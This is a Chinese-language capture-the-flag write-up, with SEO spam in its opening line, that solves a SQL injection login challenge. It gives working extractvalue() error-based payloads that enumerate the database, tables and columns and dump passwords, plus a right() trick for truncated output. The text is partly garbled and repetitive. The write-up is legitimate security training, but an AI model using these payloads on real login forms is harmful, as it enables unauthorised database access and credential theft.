网站制作技巧,技能培训班有哪些课程,宁波优化seo软件公司,wordpress服务器配置文件extractvalue(1,concat(‘~’, (‘your sql’) ) )报错注入#xff0c;注意爆破字段的时候表名有可能是table_name不是table_schema
有登录输入框 常规尝试一下
常规的万能密码#xff0c;返回了一个“admin的密码”#xff1a; Hello admin#xff01; Your password is…extractvalue(1,concat(‘~’, (‘your sql’) ) )报错注入注意爆破字段的时候表名有可能是table_name不是table_schema
有登录输入框 常规尝试一下
常规的万能密码返回了一个“admin的密码” Hello admin Your password is ‘f04b51f7f1de73ee7860c9eb023ea1c8’ 没有任何有用信息 尝试报错注入 回顾 我的练习6
extractvalue(1,concat(~,(select(database()))))%23
#完整后缀
/check.php
?usernameadmin
passwordf04b51f7f1de73ee7860c9eb023ea1c8
or extractvalue(1,concat(~,(select(database()))))%23成功返回数据库名’geek’ 那继续沿用爆表
#查表
select group_concat(table_name) from information_schema.tables where table_schemageek
#放到报错函数中
extractvalue(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schemageek)))%23成功返回表名:应该是第二个用得上l0ve1ysq1 继续爆破字段 这里还是要注意 最后是where table_name‘l0ve1ysq1’ 不是table_schema
select group_concat(column_name) from information_schema.columns where table_schemadatabase()# 这里还是要注意最后是where table_namel0ve1ysq1,不是table_schema
extractvalue(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_namel0ve1ysq1)))%23成功继续看一下内容
select group_concat(password) fropm l0ve1ysq1 where id1extractvalue(1,concat(~,(select group_concat(password) from l0ve1ysq1 where id1)))%23这里一直尝试到id16才找到flag 的一部分 ~flag{dba94064-c18c-4c85-8821-30 id17是无效的 所以也需要用到right函数显示后半部分 right(password,30) extractvalue(1,concat(~,(select group_concat(right(password,30) )from l0ve1ysq1 where id16)))%23~4-c18c-4c85-8821-301279f9a32a}拼接一下即可 flag{dba94064-c18c-4c85-8821-301279f9a32a}
End